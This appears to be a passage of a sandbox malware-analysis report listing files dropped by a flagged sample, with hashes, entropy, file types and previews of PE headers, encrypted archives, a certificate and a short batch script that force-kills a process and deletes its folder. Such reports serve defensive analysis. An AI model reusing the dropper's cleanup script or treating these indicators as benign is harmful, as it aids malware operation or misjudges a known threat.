                                                                                                                                                                                                                              Preview:MIIDUDCCAjigAwIBAgIQImsjBGfFTk6M7sZzNVcAwDANBgkqhkiG9w0BAQsFADAlMSMwIQYDVQQDExphdXRoLmluc3RhbGxlcnNlcnZpY2VzLmNvbTAeFw0yMzEwMjUyMzEzNDhaFw0yODEwMjUyMzIzNDhaMCUxIzAhBgNVBAMTGmF1dGguaW5zdGFsbGVyc2VydmljZXMuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwnTHlqfx0MmiBSvhwkjmo2Y53B2ED6kyYgNgsSoX090DwL9g08Q2LnfEEFH+mif1Zv6jztT5QvWXjjroucDJQzZFBz/xbd1zilX80JFxD/8TIiKdmg73eXcrkSTsQUz97HwnpZbQDWbQJh/QxbvRIrJrcU2ADGsC5KBpRVXJ3t9m3TKNrfbAtKpPonso6+6GHvwUNTZUU9UgvDV3qGpDSniqumK3a1U9hphJJBb8us3o3538CM3tJAJ2w/bDGA/MOaTInkspZIQpecv16wkMWuLyHUxAaMDIO0tuIKxeIka0PaTAaZdw6BXofnNqwDD5JloOGm323JAR3pe+hJmSmQIDAQABo3wwejAOBgNVHQ8BAf8EBAMCBaAwCQYDVR0TBAIwADAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwHwYDVR0jBBgwFoAUL8Xv6MyxPZ8/T+cj4fEkfSpVzqEwHQYDVR0OBBYEFC/F7+jMsT2fP0/nI+HxJH0qVc6hMA0GCSqGSIb3DQEBCwUAA4IBAQASgm1VIK9vC88LPaCv7qPEd2TUtRrOi/VG2HkcpmBIKGoDeFa41jzKpO25iMg4MQhlXuljIYMDch8YpZETcFvBXHzfCF7Rc+kl/K5tFd8kHGMItiPuwZV/BfvL9Wu4gY4g1skfRpiemP1gZvlc1fZlEoYDqAIzODkRyXOd2nsa7zt8iGTdNujZ8A/IyQzGNeqtmt+bpNvKojkB
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2989568
                                                                                                                                                                                                                              Entropy (8bit):6.518795012161611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:HPwL/gU97fpS9iZXovvQyWVkeRJFm0w7KwKz:vwLY47fpkyYvv7sbP
                                                                                                                                                                                                                              MD5:3799F4F2CFC27184CE70913F4EC3A8BE
                                                                                                                                                                                                                              SHA1:4424871CDFD4F9B4FB1039049A75844401A7C358
                                                                                                                                                                                                                              SHA-256:F95DF3026CF4EDCC3D334BFC20D188DE06EA4E4497E94C63504B2B783DC3E55E
                                                                                                                                                                                                                              SHA-512:F38B986C639EB2C676E0ECD9316CEA437934550D772F5494E2589626E826A5D23954398C3E4EB4584594E5E6CBEA28FFE195BEA27D2674F1A8119CA14EE869A0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......Q....@.................................W...k.............................1..............................-1..................................................... . ............................@....rsrc...............................@....idata ............................@...uyzzfcwd..*.......*.................@...cnrltnzy.....@1......x-.............@....taggant.0...P1.."...|-.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1679360
                                                                                                                                                                                                                              Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                              MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                              SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                              SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                              SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):468992
                                                                                                                                                                                                                              Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                                              MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                              SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                              SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):222
                                                                                                                                                                                                                              Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                                              MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                              SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                              SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                              SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2355713
                                                                                                                                                                                                                              Entropy (8bit):5.891648193754473
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                                                              MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                                              SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                                              SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                                              SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1799594
                                                                                                                                                                                                                              Entropy (8bit):7.99773141173711
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                                                                              MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                                                              SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                                                              SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                                                              SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1799748
                                                                                                                                                                                                                              Entropy (8bit):7.997729415613798
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                                                                                              MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                                                              SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                                                              SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                                                              SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
